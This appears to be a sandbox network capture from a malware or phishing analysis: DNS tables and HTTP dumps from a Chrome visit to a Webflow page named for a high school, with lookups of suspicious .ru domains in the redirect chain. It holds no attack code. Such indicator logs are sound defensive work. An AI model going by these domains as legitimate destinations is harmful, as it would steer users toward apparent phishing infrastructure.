                                                    Mar 28, 2025 13:42:42.292522907 CET192.168.2.51.1.1.10xc990Standard query (0)cdn.prod.website-files.com65IN (0x0001)false
                                                    Mar 28, 2025 13:42:54.566684008 CET192.168.2.51.1.1.10xc071Standard query (0)fgof.koxicarev.ruA (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:54.566956997 CET192.168.2.51.1.1.10x6236Standard query (0)fgof.koxicarev.ru65IN (0x0001)false
                                                    Mar 28, 2025 13:42:56.047911882 CET192.168.2.51.1.1.10xf216Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:56.048063040 CET192.168.2.51.1.1.10x5057Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.547029972 CET192.168.2.51.1.1.10x6e0aStandard query (0)zh1od.idmquc.ruA (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.547318935 CET192.168.2.51.1.1.10x1bfStandard query (0)zh1od.idmquc.ru65IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.841280937 CET192.168.2.51.1.1.10xe594Standard query (0)zh1od.idmquc.ruA (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.841425896 CET192.168.2.51.1.1.10xa4f8Standard query (0)zh1od.idmquc.ru65IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 28, 2025 13:42:38.585083008 CET1.1.1.1192.168.2.50xb303No error (0)www.google.com142.251.40.164A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:38.585721016 CET1.1.1.1192.168.2.50x526dNo error (0)www.google.com65IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.039659977 CET1.1.1.1192.168.2.50xace6No error (0)littlestownseniorhighschool.webflow.io104.18.36.248A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.039659977 CET1.1.1.1192.168.2.50xace6No error (0)littlestownseniorhighschool.webflow.io172.64.151.8A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.044315100 CET1.1.1.1192.168.2.50xd1e1No error (0)littlestownseniorhighschool.webflow.io65IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608369112 CET1.1.1.1192.168.2.50xde73No error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608369112 CET1.1.1.1192.168.2.50xde73No error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608395100 CET1.1.1.1192.168.2.50xbf02No error (0)cdn.prod.website-files.com65IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608407974 CET1.1.1.1192.168.2.50xa377No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.210A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608407974 CET1.1.1.1192.168.2.50xa377No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.183A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608407974 CET1.1.1.1192.168.2.50xa377No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.68A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:40.608407974 CET1.1.1.1192.168.2.50xa377No error (0)d3e54v103j8qbb.cloudfront.net13.33.251.140A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:41.978862047 CET1.1.1.1192.168.2.50xefeeNo error (0)d3e54v103j8qbb.cloudfront.net13.33.251.140A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:41.978862047 CET1.1.1.1192.168.2.50xefeeNo error (0)d3e54v103j8qbb.cloudfront.net13.33.251.210A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:41.978862047 CET1.1.1.1192.168.2.50xefeeNo error (0)d3e54v103j8qbb.cloudfront.net13.33.251.183A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:41.978862047 CET1.1.1.1192.168.2.50xefeeNo error (0)d3e54v103j8qbb.cloudfront.net13.33.251.68A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:42.380947113 CET1.1.1.1192.168.2.50xbfa5No error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:42.380947113 CET1.1.1.1192.168.2.50xbfa5No error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:42.380965948 CET1.1.1.1192.168.2.50xc990No error (0)cdn.prod.website-files.com65IN (0x0001)false
                                                    Mar 28, 2025 13:42:54.769407034 CET1.1.1.1192.168.2.50xc071No error (0)fgof.koxicarev.ru172.67.166.120A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:54.769407034 CET1.1.1.1192.168.2.50xc071No error (0)fgof.koxicarev.ru104.21.73.212A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:42:54.819540977 CET1.1.1.1192.168.2.50x6236No error (0)fgof.koxicarev.ru65IN (0x0001)false
                                                    Mar 28, 2025 13:42:56.136476040 CET1.1.1.1192.168.2.50xf216No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.96.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.16.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.48.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.112.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.80.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.64.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.750153065 CET1.1.1.1192.168.2.50x6e0aNo error (0)zh1od.idmquc.ru104.21.32.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:08.854690075 CET1.1.1.1192.168.2.50x1bfNo error (0)zh1od.idmquc.ru65IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.96.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.16.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.48.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.112.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.80.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.64.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929430962 CET1.1.1.1192.168.2.50xe594No error (0)zh1od.idmquc.ru104.21.32.1A (IP address)IN (0x0001)false
                                                    Mar 28, 2025 13:43:09.929451942 CET1.1.1.1192.168.2.50xa4f8No error (0)zh1od.idmquc.ru65IN (0x0001)false
                                                    • littlestownseniorhighschool.webflow.io
                                                      • cdn.prod.website-files.com
                                                      • d3e54v103j8qbb.cloudfront.net
                                                      • fgof.koxicarev.ru
                                                        • zh1od.idmquc.ru
                                                    • www.google.com
                                                    • a.nel.cloudflare.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549730104.18.36.2484436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:40 UTC688OUTGET / HTTP/1.1
                                                    Host: littlestownseniorhighschool.webflow.io
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:40 UTC822INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:40 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    CF-Ray: 927735729b082223-EWR
                                                    CF-Cache-Status: HIT
                                                    Age: 79577
                                                    Last-Modified: Thu, 27 Mar 2025 14:31:49 GMT
                                                    content-security-policy: frame-ancestors 'self' https://*.webflow.com http://*.webflow.com http://*.webflow.io http://webflow.com https://webflow.com
                                                    surrogate-control: max-age=2147483647
                                                    surrogate-key: littlestownseniorhighschool.webflow.io 67e2c79fd85ebcb1b252e594 pageId:67e2c79fd85ebcb1b252e59b
                                                    x-lambda-id: d49c02a3-5b60-4256-9cad-bafeb9355bf9
                                                    vary: Accept-Encoding
                                                    Set-Cookie: _cfuvid=CC2dCFXfExX8L.7fcqr3YRozxYwNqai4du9sGtdH9Sc-1743165760456-0.0.1.1-604800000; path=/; domain=.webflow.io; HttpOnly; Secure; SameSite=None
                                                    Server: cloudflare
                                                    alt-svc: h3=":443"; ma=86400
                                                    2025-03-28 12:42:40 UTC547INData Raw: 37 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 77 61 73 20 63 72 65 61 74 65 64 20 69 6e 20 57 65 62 66 6c 6f 77 2e 20 68 74 74 70 73 3a 2f 2f 77 65 62 66 6c 6f 77 2e 63 6f 6d 20 2d 2d 3e 3c 21 2d 2d 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 75 65 20 4d 61 72 20 32 35 20 32 30 32 35 20 31 35 3a 31 33 3a 34 33 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 2d 2d 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 77 66 2d 64 6f 6d 61 69 6e 3d 22 6c 69 74 74 6c 65 73 74 6f 77 6e 73 65 6e 69 6f 72 68 69 67 68 73 63 68 6f 6f 6c 2e 77 65 62 66 6c 6f 77 2e 69 6f 22 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 37 65 32 63 37 39 66 64 38
                                                    Data Ascii: 786<!DOCTYPE html>... This site was created in Webflow. https://webflow.com -->... Last Published: Tue Mar 25 2025 15:13:43 GMT+0000 (Coordinated Universal Time) --><html data-wf-domain="littlestownseniorhighschool.webflow.io" data-wf-page="67e2c79fd8
                                                    2025-03-28 12:42:40 UTC1369INData Raw: 65 2d 66 69 6c 65 73 2e 63 6f 6d 2f 36 37 65 32 63 37 39 66 64 38 35 65 62 63 62 31 62 32 35 32 65 35 39 34 2f 63 73 73 2f 6c 69 74 74 6c 65 73 74 6f 77 6e 73 65 6e 69 6f 72 68 69 67 68 73 63 68 6f 6f 6c 2e 77 65 62 66 6c 6f 77 2e 37 65 33 65 32 30 61 34 62 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6e 3d 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 74 3d 22 20 77 2d 6d 6f 64 2d 22 3b 6e 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 74 2b 22 6a 73 22 2c 28 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 6f 7c 7c 6f 2e 44 6f 63 75
                                                    Data Ascii: e-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css" rel="stylesheet" type="text/css"/><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.Docu
                                                    2025-03-28 12:42:40 UTC17INData Raw: 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: ></body></html>
                                                    2025-03-28 12:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549735104.18.160.1174436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:40 UTC681OUTGET /67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css HTTP/1.1
                                                    Host: cdn.prod.website-files.com
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: text/css,*/*;q=0.1
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: style
                                                    Sec-Fetch-Storage-Access: active
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:41 UTC631INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:41 GMT
                                                    Content-Type: text/css
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-amz-id-2: OdhHrAKGhRXAkaG50aEOctqmdyth54dgIOa6kvgQXXyk6Me/9z3fEZ9FYxwk6IwRd0jNkr8n2t8=
                                                    x-amz-request-id: 6PSBGD08D7FP6T3C
                                                    Last-Modified: Tue, 25 Mar 2025 15:13:44 GMT
                                                    ETag: W/"ba87cc9163a5163dfacbb140e5f6063e"
                                                    x-amz-server-side-encryption: AES256
                                                    Cache-Control: public, max-age=31536000, immutable
                                                    x-amz-version-id: esqAqPwEw_inkNjLS.r0VYjfh46YjMCW
                                                    CF-Cache-Status: HIT
                                                    Age: 79577
                                                    Access-Control-Allow-Origin: *
                                                    Server: cloudflare
                                                    CF-RAY: 9277357628824392-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2025-03-28 12:42:41 UTC738INData Raw: 37 64 33 38 0d 0a 68 74 6d 6c 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 0a 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 64 65 74 61 69 6c 73 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 69 67 75 72 65 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 61 69 6e 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61 72 79 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a
                                                    Data Ascii: 7d38html { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; font-family: sans-serif;}body { margin: 0;}article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block;}
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 38 30 25 3b 0a 7d 0a 0a 73 75 62 2c 20 73 75 70 20 7b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 73 75 70 20 7b 0a 20 20 74 6f 70 3a 20 2d 2e 35 65 6d 3b 0a 7d 0a 0a 73 75 62 20 7b 0a 20 20 62 6f 74 74 6f 6d 3a 20 2d 2e 32 35 65 6d 3b 0a 7d 0a 0a 69 6d 67 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 0a 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 20 7b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 72 20 7b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 0a 20 20 68
                                                    Data Ascii: 80%;}sub, sup { vertical-align: baseline; font-size: 75%; line-height: 0; position: relative;}sup { top: -.5em;}sub { bottom: -.25em;}img { border: 0;}svg:not(:root) { overflow: hidden;}hr { box-sizing: content-box; h
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 72 2d 73 70 61 63 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 74 64 2c 20 74 68 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 77 65 62 66 6c 6f 77 2d 69 63 6f 6e 73 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 66 6f 6e 74 2d 74 74 66 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 41 41 45 41 41 41 41 4c 41 49 41 41 41 77 41 77 54 31 4d 76 4d 67 38 53 42 69 55 41 41 41 43 38 41 41 41 41 59 47 4e 74 59 58 44 70 50 2b 61 34 41 41 41 42 48 41 41 41 41 46 78 6e 59 58 4e 77 41 41 41 41 45 41 41 41 41 58 67 41 41 41 41 49 5a 32 78 35 5a 6d 68 53 32 58 45 41 41 41 47 41 41 41 41 44 48 47 68 6c 59 57 51 54
                                                    Data Ascii: r-spacing: 0;}td, th { padding: 0;}@font-face { font-family: webflow-icons; src: url("data:application/x-font-ttf;charset=utf-8;base64,AAEAAAALAIAAAwAwT1MvMg8SBiUAAAC8AAAAYGNtYXDpP+a4AAABHAAAAFxnYXNwAAAAEAAAAXgAAAAIZ2x5ZmhS2XEAAAGAAAADHGhlYWQT
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 45 67 62 30 74 4b 56 56 56 4b 53 32 38 67 49 53 45 67 62 30 74 4b 56 56 56 4b 53 32 38 67 49 51 41 42 41 41 41 42 77 41 49 41 41 38 41 41 45 67 41 41 45 7a 51 33 50 67 45 33 4e 6a 4d 78 46 53 49 48 44 67 45 48 42 68 55 78 49 77 41 6f 4b 49 74 65 58 57 70 56 53 6b 74 76 49 43 46 6d 41 63 42 71 58 56 36 4c 4b 43 68 6d 49 53 42 76 53 30 70 56 41 41 41 41 41 67 41 41 2f 38 41 46 74 67 50 41 41 44 49 41 4f 67 41 41 41 52 59 58 48 67 45 58 46 68 55 55 42 77 34 42 42 77 59 48 49 78 55 68 49 69 63 75 41 53 63 6d 4e 54 51 33 50 67 45 33 4e 6a 4d 78 4f 41 45 78 4e 44 63 2b 41 54 63 32 4d 7a 49 58 48 67 45 58 46 68 63 56 41 54 4d 4a 41 54 4d 56 4d 7a 55 45 6a 44 38 33 4e 6c 41 58 46 78 59 58 54 6a 55 31 50 51 4c 38 6b 7a 30 31 4e 6b 38 58 46 78 63 58 54 7a 59 31 50
                                                    Data Ascii: Egb0tKVVVKS28gISEgb0tKVVVKS28gIQABAAABwAIAA8AAEgAAEzQ3PgE3NjMxFSIHDgEHBhUxIwAoKIteXWpVSktvICFmAcBqXV6LKChmISBvS0pVAAAAAgAA/8AFtgPAADIAOgAAARYXHgEXFhUUBw4BBwYHIxUhIicuAScmNTQ3PgE3NjMxOAExNDc+ATc2MzIXHgEXFhcVATMJATMVMzUEjD83NlAXFxYXTjU1PQL8kz01Nk8XFxcXTzY1P
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 22 5d 2c 20 5b 63 6c 61 73 73 2a 3d 22 20 77 2d 69 63 6f 6e 2d 22 5d 20 7b 0a 20 20 73 70 65 61 6b 3a 20 6e 6f 6e 65 3b 0a 20 20 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 77 65 62 66 6c 6f 77 2d 69 63 6f
                                                    Data Ascii: "], [class*=" w-icon-"] { speak: none; font-variant: normal; text-transform: none; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-style: normal; font-weight: normal; line-height: 1; font-family: webflow-ico
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 39 70 78 20 31 35 70 78 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 69 6e 70 75 74 2e 77 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 62 75 74 74 6f 6e 3b 0a 7d 0a 0a 68 74 6d 6c 5b 64 61 74 61 2d 77 2d 64 79 6e 70 61 67 65 5d 20 5b 64 61 74 61 2d 77 2d 63 6c 6f 61 6b 5d 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 2d 63 6f 64 65 2d 62 6c 6f 63 6b 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 75 6e 73 65 74 3b 0a 7d 0a 0a 70 72 65 2e 77 2d 63 6f 64 65 2d 62 6c 6f
                                                    Data Ascii: r-radius: 0; padding: 9px 15px; text-decoration: none; display: inline-block;}input.w-button { -webkit-appearance: button;}html[data-w-dynpage] [data-w-cloak] { color: #0000 !important;}.w-code-block { margin: unset;}pre.w-code-blo
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 73 65 74 3b 0a 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 75 6e 73 65 74 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 75 6e 73 65 74 3b 0a 7d 0a 0a 2e 77 2d 77 65 62 66 6c 6f 77 2d 62 61 64 67 65 20 7b 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 31 70 78 20 23 30 30 30 30 30 30 31 61 2c 20 30 20 31 70 78 20 33 70 78 20 23 30 30 30 30 30 30 31 61 3b 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 32 31 34 37 34 38 33 36 34 37 20 21 69 6d 70 6f 72 74 61
                                                    Data Ascii: set; word-wrap: unset; transition: unset;}.w-webflow-badge { white-space: nowrap; cursor: pointer; box-shadow: 0 0 0 1px #0000001a, 0 1px 3px #0000001a; visibility: visible !important; opacity: 1 !important; z-index: 2147483647 !importa
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 7d 0a 0a 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 23 65 32 65 32 65 32 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 0a 66 69 67 75 72 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 66 69 67 63 61 70 74 69 6f 6e 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                    Data Ascii: -height: 18px;}p { margin-top: 0; margin-bottom: 10px;}blockquote { border-left: 5px solid #e2e2e2; margin: 0 0 10px; padding: 10px 20px; font-size: 18px; line-height: 22px;}figure { margin: 0 0 10px;}figcaption { text-align:
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 3a 20 33 38 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 38 70 78 20 31 32 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 2c 20 2e 77 2d 73 65 6c 65 63 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 7d 0a 0a 2e 77 2d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 20 2e 77 2d 73 65 6c 65 63 74 3a 66 6f 63 75 73 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 33 38 39 38 65 63 3b 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0a
                                                    Data Ascii: : 38px; margin-bottom: 10px; padding: 8px 12px; font-size: 14px; line-height: 1.42857; display: block;}.w-input::placeholder, .w-select::placeholder { color: #999;}.w-input:focus, .w-select:focus { border-color: #3898ec; outline: 0;
